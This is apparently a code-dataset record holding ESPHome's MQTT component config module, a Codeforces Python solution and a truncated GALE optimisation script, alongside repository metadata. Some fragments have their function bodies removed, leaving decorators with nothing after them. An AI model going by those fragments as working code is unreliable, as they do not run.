CONFIG_SCHEMA = cv.All(
cv.Schema(
{
cv.GenerateID(): cv.declare_id(MQTTClientComponent),
cv.Required(CONF_BROKER): cv.string_strict,
cv.Optional(CONF_PORT, default=1883): cv.port,
cv.Optional(CONF_USERNAME, default=""): cv.string,
cv.Optional(CONF_PASSWORD, default=""): cv.string,
cv.Optional(CONF_CLIENT_ID): cv.string,
cv.SplitDefault(CONF_IDF_SEND_ASYNC, esp32_idf=False): cv.All(
cv.boolean, cv.only_with_esp_idf
),
cv.Optional(CONF_CERTIFICATE_AUTHORITY): cv.All(
cv.string, cv.only_with_esp_idf
),
cv.SplitDefault(CONF_SKIP_CERT_CN_CHECK, esp32_idf=False): cv.All(
cv.boolean, cv.only_with_esp_idf
),
cv.Optional(CONF_DISCOVERY, default=True): cv.Any(
cv.boolean, cv.one_of("CLEAN", upper=True)
),
cv.Optional(CONF_DISCOVERY_RETAIN, default=True): cv.boolean,
cv.Optional(
CONF_DISCOVERY_PREFIX, default="homeassistant"
): cv.publish_topic,
cv.Optional(CONF_DISCOVERY_UNIQUE_ID_GENERATOR, default="legacy"): cv.enum(
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS
),
cv.Optional(CONF_DISCOVERY_OBJECT_ID_GENERATOR, default="none"): cv.enum(
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS
),
cv.Optional(CONF_USE_ABBREVIATIONS, default=True): cv.boolean,
cv.Optional(CONF_BIRTH_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_WILL_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_SHUTDOWN_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_TOPIC_PREFIX, default=lambda: CORE.name): cv.publish_topic,
cv.Optional(CONF_LOG_TOPIC): cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Optional(CONF_LEVEL): logger.is_log_level,
}
),
validate_message_just_topic,
),
cv.Optional(CONF_SSL_FINGERPRINTS): cv.All(
cv.only_on_esp8266, cv.ensure_list(validate_fingerprint)
),
cv.Optional(CONF_KEEPALIVE, default="15s"): cv.positive_time_period_seconds,
cv.Optional(
CONF_REBOOT_TIMEOUT, default="15min"
): cv.positive_time_period_milliseconds,
cv.Optional(CONF_ON_CONNECT): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTConnectTrigger),
}
),
cv.Optional(CONF_ON_DISCONNECT): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
MQTTDisconnectTrigger
),
}
),
cv.Optional(CONF_ON_MESSAGE): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTMessageTrigger),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_PAYLOAD): cv.string_strict,
}
),
cv.Optional(CONF_ON_JSON_MESSAGE): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
MQTTJsonMessageTrigger
),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
}
),
}
),
validate_config,
)
@coroutine_with_priority(40.0)
MQTT_PUBLISH_ACTION_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
cv.Required(CONF_PAYLOAD): cv.templatable(cv.mqtt_payload),
cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
}
)
@automation.register_action(
"mqtt.publish", MQTTPublishAction, MQTT_PUBLISH_ACTION_SCHEMA
)
MQTT_PUBLISH_JSON_ACTION_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
cv.Required(CONF_PAYLOAD): cv.lambda_,
cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
}
)
@automation.register_action(
"mqtt.publish_json", MQTTPublishJsonAction, MQTT_PUBLISH_JSON_ACTION_SCHEMA
)
@automation.register_condition(
"mqtt.connected",
MQTTConnectedCondition,
cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
}
),
)
| 37.034137 | 88 | 0.680638 | import re
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import automation
from esphome.automation import Condition
from esphome.components import logger
from esphome.const import (
CONF_AVAILABILITY,
CONF_BIRTH_MESSAGE,
CONF_BROKER,
CONF_CERTIFICATE_AUTHORITY,
CONF_CLIENT_ID,
CONF_COMMAND_TOPIC,
CONF_COMMAND_RETAIN,
CONF_DISCOVERY,
CONF_DISCOVERY_PREFIX,
CONF_DISCOVERY_RETAIN,
CONF_DISCOVERY_UNIQUE_ID_GENERATOR,
CONF_DISCOVERY_OBJECT_ID_GENERATOR,
CONF_ID,
CONF_KEEPALIVE,
CONF_LEVEL,
CONF_LOG_TOPIC,
CONF_ON_JSON_MESSAGE,
CONF_ON_MESSAGE,
CONF_ON_CONNECT,
CONF_ON_DISCONNECT,
CONF_PASSWORD,
CONF_PAYLOAD,
CONF_PAYLOAD_AVAILABLE,
CONF_PAYLOAD_NOT_AVAILABLE,
CONF_PORT,
CONF_QOS,
CONF_REBOOT_TIMEOUT,
CONF_RETAIN,
CONF_SHUTDOWN_MESSAGE,
CONF_SSL_FINGERPRINTS,
CONF_STATE_TOPIC,
CONF_TOPIC,
CONF_TOPIC_PREFIX,
CONF_TRIGGER_ID,
CONF_USE_ABBREVIATIONS,
CONF_USERNAME,
CONF_WILL_MESSAGE,
)
from esphome.core import coroutine_with_priority, CORE
from esphome.components.esp32 import add_idf_sdkconfig_option
DEPENDENCIES = ["network"]
AUTO_LOAD = ["json"]
CONF_IDF_SEND_ASYNC = "idf_send_async"
CONF_SKIP_CERT_CN_CHECK = "skip_cert_cn_check"
def validate_message_just_topic(value):
value = cv.publish_topic(value)
return MQTT_MESSAGE_BASE({CONF_TOPIC: value})
MQTT_MESSAGE_BASE = cv.Schema(
{
cv.Required(CONF_TOPIC): cv.publish_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_RETAIN, default=True): cv.boolean,
}
)
MQTT_MESSAGE_TEMPLATE_SCHEMA = cv.Any(
None, MQTT_MESSAGE_BASE, validate_message_just_topic
)
MQTT_MESSAGE_SCHEMA = cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Required(CONF_PAYLOAD): cv.mqtt_payload,
}
),
)
mqtt_ns = cg.esphome_ns.namespace("mqtt")
MQTTMessage = mqtt_ns.struct("MQTTMessage")
MQTTClientComponent = mqtt_ns.class_("MQTTClientComponent", cg.Component)
MQTTPublishAction = mqtt_ns.class_("MQTTPublishAction", automation.Action)
MQTTPublishJsonAction = mqtt_ns.class_("MQTTPublishJsonAction", automation.Action)
MQTTMessageTrigger = mqtt_ns.class_(
"MQTTMessageTrigger", automation.Trigger.template(cg.std_string), cg.Component
)
MQTTJsonMessageTrigger = mqtt_ns.class_(
"MQTTJsonMessageTrigger", automation.Trigger.template(cg.JsonObjectConst)
)
MQTTConnectTrigger = mqtt_ns.class_("MQTTConnectTrigger", automation.Trigger.template())
MQTTDisconnectTrigger = mqtt_ns.class_(
"MQTTDisconnectTrigger", automation.Trigger.template()
)
MQTTComponent = mqtt_ns.class_("MQTTComponent", cg.Component)
MQTTConnectedCondition = mqtt_ns.class_("MQTTConnectedCondition", Condition)
MQTTBinarySensorComponent = mqtt_ns.class_("MQTTBinarySensorComponent", MQTTComponent)
MQTTClimateComponent = mqtt_ns.class_("MQTTClimateComponent", MQTTComponent)
MQTTCoverComponent = mqtt_ns.class_("MQTTCoverComponent", MQTTComponent)
MQTTFanComponent = mqtt_ns.class_("MQTTFanComponent", MQTTComponent)
MQTTJSONLightComponent = mqtt_ns.class_("MQTTJSONLightComponent", MQTTComponent)
MQTTSensorComponent = mqtt_ns.class_("MQTTSensorComponent", MQTTComponent)
MQTTSwitchComponent = mqtt_ns.class_("MQTTSwitchComponent", MQTTComponent)
MQTTTextSensor = mqtt_ns.class_("MQTTTextSensor", MQTTComponent)
MQTTNumberComponent = mqtt_ns.class_("MQTTNumberComponent", MQTTComponent)
MQTTSelectComponent = mqtt_ns.class_("MQTTSelectComponent", MQTTComponent)
MQTTButtonComponent = mqtt_ns.class_("MQTTButtonComponent", MQTTComponent)
MQTTLockComponent = mqtt_ns.class_("MQTTLockComponent", MQTTComponent)
MQTTDiscoveryUniqueIdGenerator = mqtt_ns.enum("MQTTDiscoveryUniqueIdGenerator")
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS = {
"legacy": MQTTDiscoveryUniqueIdGenerator.MQTT_LEGACY_UNIQUE_ID_GENERATOR,
"mac": MQTTDiscoveryUniqueIdGenerator.MQTT_MAC_ADDRESS_UNIQUE_ID_GENERATOR,
}
MQTTDiscoveryObjectIdGenerator = mqtt_ns.enum("MQTTDiscoveryObjectIdGenerator")
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS = {
"none": MQTTDiscoveryObjectIdGenerator.MQTT_NONE_OBJECT_ID_GENERATOR,
"device_name": MQTTDiscoveryObjectIdGenerator.MQTT_DEVICE_NAME_OBJECT_ID_GENERATOR,
}
def validate_config(value):
# Populate default fields
out = value.copy()
topic_prefix = value[CONF_TOPIC_PREFIX]
if CONF_BIRTH_MESSAGE not in value:
out[CONF_BIRTH_MESSAGE] = {
CONF_TOPIC: f"{topic_prefix}/status",
CONF_PAYLOAD: "online",
CONF_QOS: 0,
CONF_RETAIN: True,
}
if CONF_WILL_MESSAGE not in value:
out[CONF_WILL_MESSAGE] = {
CONF_TOPIC: f"{topic_prefix}/status",
CONF_PAYLOAD: "offline",
CONF_QOS: 0,
CONF_RETAIN: True,
}
if CONF_SHUTDOWN_MESSAGE not in value:
out[CONF_SHUTDOWN_MESSAGE] = {
CONF_TOPIC: f"{topic_prefix}/status",
CONF_PAYLOAD: "offline",
CONF_QOS: 0,
CONF_RETAIN: True,
}
if CONF_LOG_TOPIC not in value:
out[CONF_LOG_TOPIC] = {
CONF_TOPIC: f"{topic_prefix}/debug",
CONF_QOS: 0,
CONF_RETAIN: True,
}
return out
def validate_fingerprint(value):
value = cv.string(value)
if re.match(r"^[0-9a-f]{40}$", value) is None:
raise cv.Invalid("fingerprint must be valid SHA1 hash")
return value
CONFIG_SCHEMA = cv.All(
cv.Schema(
{
cv.GenerateID(): cv.declare_id(MQTTClientComponent),
cv.Required(CONF_BROKER): cv.string_strict,
cv.Optional(CONF_PORT, default=1883): cv.port,
cv.Optional(CONF_USERNAME, default=""): cv.string,
cv.Optional(CONF_PASSWORD, default=""): cv.string,
cv.Optional(CONF_CLIENT_ID): cv.string,
cv.SplitDefault(CONF_IDF_SEND_ASYNC, esp32_idf=False): cv.All(
cv.boolean, cv.only_with_esp_idf
),
cv.Optional(CONF_CERTIFICATE_AUTHORITY): cv.All(
cv.string, cv.only_with_esp_idf
),
cv.SplitDefault(CONF_SKIP_CERT_CN_CHECK, esp32_idf=False): cv.All(
cv.boolean, cv.only_with_esp_idf
),
cv.Optional(CONF_DISCOVERY, default=True): cv.Any(
cv.boolean, cv.one_of("CLEAN", upper=True)
),
cv.Optional(CONF_DISCOVERY_RETAIN, default=True): cv.boolean,
cv.Optional(
CONF_DISCOVERY_PREFIX, default="homeassistant"
): cv.publish_topic,
cv.Optional(CONF_DISCOVERY_UNIQUE_ID_GENERATOR, default="legacy"): cv.enum(
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS
),
cv.Optional(CONF_DISCOVERY_OBJECT_ID_GENERATOR, default="none"): cv.enum(
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS
),
cv.Optional(CONF_USE_ABBREVIATIONS, default=True): cv.boolean,
cv.Optional(CONF_BIRTH_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_WILL_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_SHUTDOWN_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_TOPIC_PREFIX, default=lambda: CORE.name): cv.publish_topic,
cv.Optional(CONF_LOG_TOPIC): cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Optional(CONF_LEVEL): logger.is_log_level,
}
),
validate_message_just_topic,
),
cv.Optional(CONF_SSL_FINGERPRINTS): cv.All(
cv.only_on_esp8266, cv.ensure_list(validate_fingerprint)
),
cv.Optional(CONF_KEEPALIVE, default="15s"): cv.positive_time_period_seconds,
cv.Optional(
CONF_REBOOT_TIMEOUT, default="15min"
): cv.positive_time_period_milliseconds,
cv.Optional(CONF_ON_CONNECT): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTConnectTrigger),
}
),
cv.Optional(CONF_ON_DISCONNECT): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
MQTTDisconnectTrigger
),
}
),
cv.Optional(CONF_ON_MESSAGE): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTMessageTrigger),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_PAYLOAD): cv.string_strict,
}
),
cv.Optional(CONF_ON_JSON_MESSAGE): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
MQTTJsonMessageTrigger
),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
}
),
}
),
validate_config,
)
def exp_mqtt_message(config):
if config is None:
return cg.optional(cg.TemplateArguments(MQTTMessage))
exp = cg.StructInitializer(
MQTTMessage,
("topic", config[CONF_TOPIC]),
("payload", config.get(CONF_PAYLOAD, "")),
("qos", config[CONF_QOS]),
("retain", config[CONF_RETAIN]),
)
return exp
@coroutine_with_priority(40.0)
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
# Add required libraries for arduino
if CORE.using_arduino:
# https://github.com/OttoWinter/async-mqtt-client/blob/master/library.json
cg.add_library("ottowinter/AsyncMqttClient-esphome", "0.8.6")
cg.add_define("USE_MQTT")
cg.add_global(mqtt_ns.using)
cg.add(var.set_broker_address(config[CONF_BROKER]))
cg.add(var.set_broker_port(config[CONF_PORT]))
cg.add(var.set_username(config[CONF_USERNAME]))
cg.add(var.set_password(config[CONF_PASSWORD]))
if CONF_CLIENT_ID in config:
cg.add(var.set_client_id(config[CONF_CLIENT_ID]))
discovery = config[CONF_DISCOVERY]
discovery_retain = config[CONF_DISCOVERY_RETAIN]
discovery_prefix = config[CONF_DISCOVERY_PREFIX]
discovery_unique_id_generator = config[CONF_DISCOVERY_UNIQUE_ID_GENERATOR]
discovery_object_id_generator = config[CONF_DISCOVERY_OBJECT_ID_GENERATOR]
if not discovery:
cg.add(var.disable_discovery())
elif discovery == "CLEAN":
cg.add(
var.set_discovery_info(
discovery_prefix,
discovery_unique_id_generator,
discovery_object_id_generator,
discovery_retain,
True,
)
)
elif CONF_DISCOVERY_RETAIN in config or CONF_DISCOVERY_PREFIX in config:
cg.add(
var.set_discovery_info(
discovery_prefix,
discovery_unique_id_generator,
discovery_object_id_generator,
discovery_retain,
)
)
cg.add(var.set_topic_prefix(config[CONF_TOPIC_PREFIX]))
if config[CONF_USE_ABBREVIATIONS]:
cg.add_define("USE_MQTT_ABBREVIATIONS")
birth_message = config[CONF_BIRTH_MESSAGE]
if not birth_message:
cg.add(var.disable_birth_message())
else:
cg.add(var.set_birth_message(exp_mqtt_message(birth_message)))
will_message = config[CONF_WILL_MESSAGE]
if not will_message:
cg.add(var.disable_last_will())
else:
cg.add(var.set_last_will(exp_mqtt_message(will_message)))
shutdown_message = config[CONF_SHUTDOWN_MESSAGE]
if not shutdown_message:
cg.add(var.disable_shutdown_message())
else:
cg.add(var.set_shutdown_message(exp_mqtt_message(shutdown_message)))
log_topic = config[CONF_LOG_TOPIC]
if not log_topic:
cg.add(var.disable_log_message())
else:
cg.add(var.set_log_message_template(exp_mqtt_message(log_topic)))
if CONF_LEVEL in log_topic:
cg.add(var.set_log_level(logger.LOG_LEVELS[log_topic[CONF_LEVEL]]))
if CONF_SSL_FINGERPRINTS in config:
for fingerprint in config[CONF_SSL_FINGERPRINTS]:
arr = [
cg.RawExpression(f"0x{fingerprint[i:i + 2]}") for i in range(0, 40, 2)
]
cg.add(var.add_ssl_fingerprint(arr))
cg.add_build_flag("-DASYNC_TCP_SSL_ENABLED=1")
cg.add(var.set_keep_alive(config[CONF_KEEPALIVE]))
cg.add(var.set_reboot_timeout(config[CONF_REBOOT_TIMEOUT]))
# esp-idf only
if CONF_CERTIFICATE_AUTHORITY in config:
cg.add(var.set_ca_certificate(config[CONF_CERTIFICATE_AUTHORITY]))
cg.add(var.set_skip_cert_cn_check(config[CONF_SKIP_CERT_CN_CHECK]))
# prevent error -0x428e
# See https://github.com/espressif/esp-idf/issues/139
add_idf_sdkconfig_option("CONFIG_MBEDTLS_HARDWARE_MPI", False)
if CONF_IDF_SEND_ASYNC in config and config[CONF_IDF_SEND_ASYNC]:
cg.add_define("USE_MQTT_IDF_ENQUEUE")
# end esp-idf
for conf in config.get(CONF_ON_MESSAGE, []):
trig = cg.new_Pvariable(conf[CONF_TRIGGER_ID], conf[CONF_TOPIC])
cg.add(trig.set_qos(conf[CONF_QOS]))
if CONF_PAYLOAD in conf:
cg.add(trig.set_payload(conf[CONF_PAYLOAD]))
await cg.register_component(trig, conf)
await automation.build_automation(trig, [(cg.std_string, "x")], conf)
for conf in config.get(CONF_ON_JSON_MESSAGE, []):
trig = cg.new_Pvariable(conf[CONF_TRIGGER_ID], conf[CONF_TOPIC], conf[CONF_QOS])
await automation.build_automation(trig, [(cg.JsonObjectConst, "x")], conf)
for conf in config.get(CONF_ON_CONNECT, []):
trigger = cg.new_Pvariable(conf[CONF_TRIGGER_ID], var)
await automation.build_automation(trigger, [], conf)
for conf in config.get(CONF_ON_DISCONNECT, []):
trigger = cg.new_Pvariable(conf[CONF_TRIGGER_ID], var)
await automation.build_automation(trigger, [], conf)
MQTT_PUBLISH_ACTION_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
cv.Required(CONF_PAYLOAD): cv.templatable(cv.mqtt_payload),
cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
}
)
@automation.register_action(
"mqtt.publish", MQTTPublishAction, MQTT_PUBLISH_ACTION_SCHEMA
)
async def mqtt_publish_action_to_code(config, action_id, template_arg, args):
paren = await cg.get_variable(config[CONF_ID])
var = cg.new_Pvariable(action_id, template_arg, paren)
template_ = await cg.templatable(config[CONF_TOPIC], args, cg.std_string)
cg.add(var.set_topic(template_))
template_ = await cg.templatable(config[CONF_PAYLOAD], args, cg.std_string)
cg.add(var.set_payload(template_))
template_ = await cg.templatable(config[CONF_QOS], args, cg.uint8)
cg.add(var.set_qos(template_))
template_ = await cg.templatable(config[CONF_RETAIN], args, bool)
cg.add(var.set_retain(template_))
return var
MQTT_PUBLISH_JSON_ACTION_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
cv.Required(CONF_PAYLOAD): cv.lambda_,
cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
}
)
@automation.register_action(
"mqtt.publish_json", MQTTPublishJsonAction, MQTT_PUBLISH_JSON_ACTION_SCHEMA
)
async def mqtt_publish_json_action_to_code(config, action_id, template_arg, args):
paren = await cg.get_variable(config[CONF_ID])
var = cg.new_Pvariable(action_id, template_arg, paren)
template_ = await cg.templatable(config[CONF_TOPIC], args, cg.std_string)
cg.add(var.set_topic(template_))
args_ = args + [(cg.JsonObject, "root")]
lambda_ = await cg.process_lambda(config[CONF_PAYLOAD], args_, return_type=cg.void)
cg.add(var.set_payload(lambda_))
template_ = await cg.templatable(config[CONF_QOS], args, cg.uint8)
cg.add(var.set_qos(template_))
template_ = await cg.templatable(config[CONF_RETAIN], args, bool)
cg.add(var.set_retain(template_))
return var
def get_default_topic_for(data, component_type, name, suffix):
allowlist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_"
sanitized_name = "".join(
x for x in name.lower().replace(" ", "_") if x in allowlist
)
return f"{data.topic_prefix}/{component_type}/{sanitized_name}/{suffix}"
async def register_mqtt_component(var, config):
await cg.register_component(var, {})
if CONF_RETAIN in config:
cg.add(var.set_retain(config[CONF_RETAIN]))
if not config.get(CONF_DISCOVERY, True):
cg.add(var.disable_discovery())
if CONF_STATE_TOPIC in config:
cg.add(var.set_custom_state_topic(config[CONF_STATE_TOPIC]))
if CONF_COMMAND_TOPIC in config:
cg.add(var.set_custom_command_topic(config[CONF_COMMAND_TOPIC]))
if CONF_COMMAND_RETAIN in config:
cg.add(var.set_command_retain(config[CONF_COMMAND_RETAIN]))
if CONF_AVAILABILITY in config:
availability = config[CONF_AVAILABILITY]
if not availability:
cg.add(var.disable_availability())
else:
cg.add(
var.set_availability(
availability[CONF_TOPIC],
availability[CONF_PAYLOAD_AVAILABLE],
availability[CONF_PAYLOAD_NOT_AVAILABLE],
)
)
@automation.register_condition(
"mqtt.connected",
MQTTConnectedCondition,
cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
}
),
)
async def mqtt_connected_to_code(config, condition_id, template_arg, args):
paren = await cg.get_variable(config[CONF_ID])
return cg.new_Pvariable(condition_id, template_arg, paren)
| 9,009 | 0 | 226 |
a1aa629cae29520de03a214cd3415b0e7fc05606 | 456 | py | Python | intermediate problems/Algorithmic Complexity/Wrath.py | doanthinhvo/Codeforces-Solutions-in-Python | 92686f3234202ef1049e14c078dcc29b1d5ac225 | [
"MIT"
] | 4 | 2021-06-14T10:44:28.000Z | 2021-06-26T05:29:07.000Z | intermediate problems/Algorithmic Complexity/Wrath.py | doanthinhvo/Codeforces-Solutions-in-Python | 92686f3234202ef1049e14c078dcc29b1d5ac225 | [
"MIT"
] | null | null | null | intermediate problems/Algorithmic Complexity/Wrath.py | doanthinhvo/Codeforces-Solutions-in-Python | 92686f3234202ef1049e14c078dcc29b1d5ac225 | [
"MIT"
] | 2 | 2021-06-22T12:47:53.000Z | 2021-06-26T05:29:09.000Z | n = int(input())
a = list(map(int, input().split()))
count = 0
j = n - 1
#j là giới hạn bắt đầu của một lần vả: j giúp chống lặp người đã bị giết.
#j phải luôn bé hơn i, vì người ở i chỉ vả được những người ở bên trái nó.
#last_kill_pos: là giới hạn kết thúc của một lần vả.
for i in range(n - 1, -1 , -1):
j = min(i, j)
last_kill_pos = max(0, i - a[i])
if j > last_kill_pos:
count += (j - last_kill_pos)
j = last_kill_pos
print(n - count)
| 22.8 | 74 | 0.627193 | n = int(input())
a = list(map(int, input().split()))
count = 0
j = n - 1
#j là giới hạn bắt đầu của một lần vả: j giúp chống lặp người đã bị giết.
#j phải luôn bé hơn i, vì người ở i chỉ vả được những người ở bên trái nó.
#last_kill_pos: là giới hạn kết thúc của một lần vả.
for i in range(n - 1, -1 , -1):
j = min(i, j)
last_kill_pos = max(0, i - a[i])
if j > last_kill_pos:
count += (j - last_kill_pos)
j = last_kill_pos
print(n - count)
| 0 | 0 | 0 |
3df08c48b4543e016839229685c6a766d7e87508 | 4,233 | py | Python | multiProc/src/parGALE.py | rahlk/Experimental-Algorithms | d04a2d3ec5a4c54ff3ebff5cf003b93d2a983061 | [
"MIT"
] | null | null | null | multiProc/src/parGALE.py | rahlk/Experimental-Algorithms | d04a2d3ec5a4c54ff3ebff5cf003b93d2a983061 | [
"MIT"
] | 9 | 2015-09-14T21:07:06.000Z | 2015-12-08T01:38:08.000Z | multiProc/src/parGALE.py | rahlk/Experimental-Algorithms | d04a2d3ec5a4c54ff3ebff5cf003b93d2a983061 | [
"MIT"
] | null | null | null | """
"""
from __future__ import print_function, division
import os
from demo import *
import subprocess
import sys
sys.path.append(os.path.abspath('../problems/'))
# Get the git root directory
root=repo_dir = subprocess.Popen(['git'
,'rev-parse'
, '--show-toplevel']
, stdout=subprocess.PIPE
).communicate()[0].rstrip()
sys.path.append(root)
from pdb import set_trace
from dtlz2 import DTLZ2
from multiprocessing import Pool
from random import seed as rseed, randint as randi
import numpy as np
from time import time
from tools.quality import measure
def gale0(model=DTLZ2(n_dec=30,n_obj=3), new=[], pop=int(1e4)):
"""
Recursive FASTMAP clustering.
"""
if len(new)==0:
frontier = model.generate(pop)
else:
frontier=new
frontier.extend(model.generate(pop-len(new)))
N = np.shape(frontier)[0]
leaf = []
norm = np.max(frontier, axis=0) - np.min(frontier, axis=0)
recurse(frontier)
a,b=distant(leaf)
(good, bad) = (a,b) if cdom(model.solve(a), model.solve(b)) else (b,a)
new=mutate(leaf,good,g=0.5)
return new
def GALE2(n_proc=10,frontSize=100,iters=1000,model=DTLZ2(n_dec=30, n_obj=3)):
"""
WHY do threads take more time than single processors?? FIX THIS!!!
:param n_proc:
:param frontSize:
:param iters:
:param model:
:return:
"""
t = time()
collect=[]
final = []
popSize = [int(frontSize/n_proc)]*n_proc
# initpop = [(model, model.generate(1000), 1000) for _ in xrange(n_proc)]
p=Pool(processes=n_proc)
collect.extend(p.map(gale2, popSize))
for cc in collect: final.extend(cc)
# set_trace()
ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final))
print('Time Taken: ', time()-t)
return ret
if __name__=="__main__":
eval(cmd()) | 27.666667 | 77 | 0.616584 | """
"""
from __future__ import print_function, division
import os
from demo import *
import subprocess
import sys
sys.path.append(os.path.abspath('../problems/'))
# Get the git root directory
root=repo_dir = subprocess.Popen(['git'
,'rev-parse'
, '--show-toplevel']
, stdout=subprocess.PIPE
).communicate()[0].rstrip()
sys.path.append(root)
from pdb import set_trace
from dtlz2 import DTLZ2
from multiprocessing import Pool
from random import seed as rseed, randint as randi
import numpy as np
from time import time
from tools.quality import measure
def gale0(model=DTLZ2(n_dec=30,n_obj=3), new=[], pop=int(1e4)):
"""
Recursive FASTMAP clustering.
"""
if len(new)==0:
frontier = model.generate(pop)
else:
frontier=new
frontier.extend(model.generate(pop-len(new)))
N = np.shape(frontier)[0]
leaf = []
norm = np.max(frontier, axis=0) - np.min(frontier, axis=0)
def cdom(x, y, better=['less','less','less']):
def loss1(i,x,y):
return (x - y) if better[i] == 'less' else (y - x)
def expLoss(i,x,y,n):
return np.exp(loss1(i,x,y) / n)
def loss(x, y):
n = min(len(x), len(y)) #lengths should be equal
losses = [expLoss(i,xi,yi,n) for i, (xi, yi) in enumerate(zip(x,y))]
return sum(losses)/n
"x dominates y if it losses least"
return loss(x,y) < loss(y,x)
def distant(lst):
R, C = np.shape(lst)
farthest=lambda one,rest: sorted(rest, key=lambda F: aDist(F,one))[-1]
one=lst[randi(0,R-1)]
mid=farthest(one, lst)
two=farthest(mid, lst)
return one, two
def mutate(lst,good,g=0.15):
new=[]
for l in lst:
new.append([a+(b-a)*g for a,b in zip(l,good)])
return new
def aDist(one, two):
return np.sqrt(np.sum((np.array(one)/norm-np.array(two)/norm)**2))
def recurse(dataset):
R, C = np.shape(dataset) # No. of Rows and Col
# Find the two most distance points.
one, two = distant(dataset)
# Project each case on
def proj(test):
a = aDist(one, test)
b = aDist(two, test)
c = aDist(one, two)
return (a**2-b**2+c**2)/(2*c)
if R<np.sqrt(N):
leaf.extend(dataset)
else:
half1 = cdom(model.solve(one), model.solve(two))
if half1:
_ = recurse(sorted(dataset,key=lambda F:proj(F))[:int(R/2)])
else:
_ = recurse(sorted(dataset,key=lambda F:proj(F))[int(R/2):])
recurse(frontier)
a,b=distant(leaf)
(good, bad) = (a,b) if cdom(model.solve(a), model.solve(b)) else (b,a)
new=mutate(leaf,good,g=0.5)
return new
def gale1(iter=1000,pop=1600,model=DTLZ2(n_dec=30, n_obj=3)):
n_proc = int(1000.00/iter)
new = gale0(model,new=[],pop=int(pop/n_proc))
while iter:
iter-=1
new=gale0(model, new, pop=int(pop/n_proc))
return new
def gale2(pop):
model = DTLZ2(n_dec=30,n_obj=3)
# set_trace()
return gale0(new=model.generate(pop))
def GALE2(n_proc=10,frontSize=100,iters=1000,model=DTLZ2(n_dec=30, n_obj=3)):
"""
WHY do threads take more time than single processors?? FIX THIS!!!
:param n_proc:
:param frontSize:
:param iters:
:param model:
:return:
"""
t = time()
collect=[]
final = []
popSize = [int(frontSize/n_proc)]*n_proc
# initpop = [(model, model.generate(1000), 1000) for _ in xrange(n_proc)]
p=Pool(processes=n_proc)
collect.extend(p.map(gale2, popSize))
for cc in collect: final.extend(cc)
# set_trace()
ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final))
print('Time Taken: ', time()-t)
return ret
def GALE(n_proc=10,frontSize=100,iters=100):
t = time()
collect=[]
final = []
per = [iters/n_proc]*n_proc
popSize = [frontSize/n_proc]*n_proc
p=Pool(processes=n_proc)
collect.extend(p.map(gale1, per))
for cc in collect: final.extend(cc)
ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final))
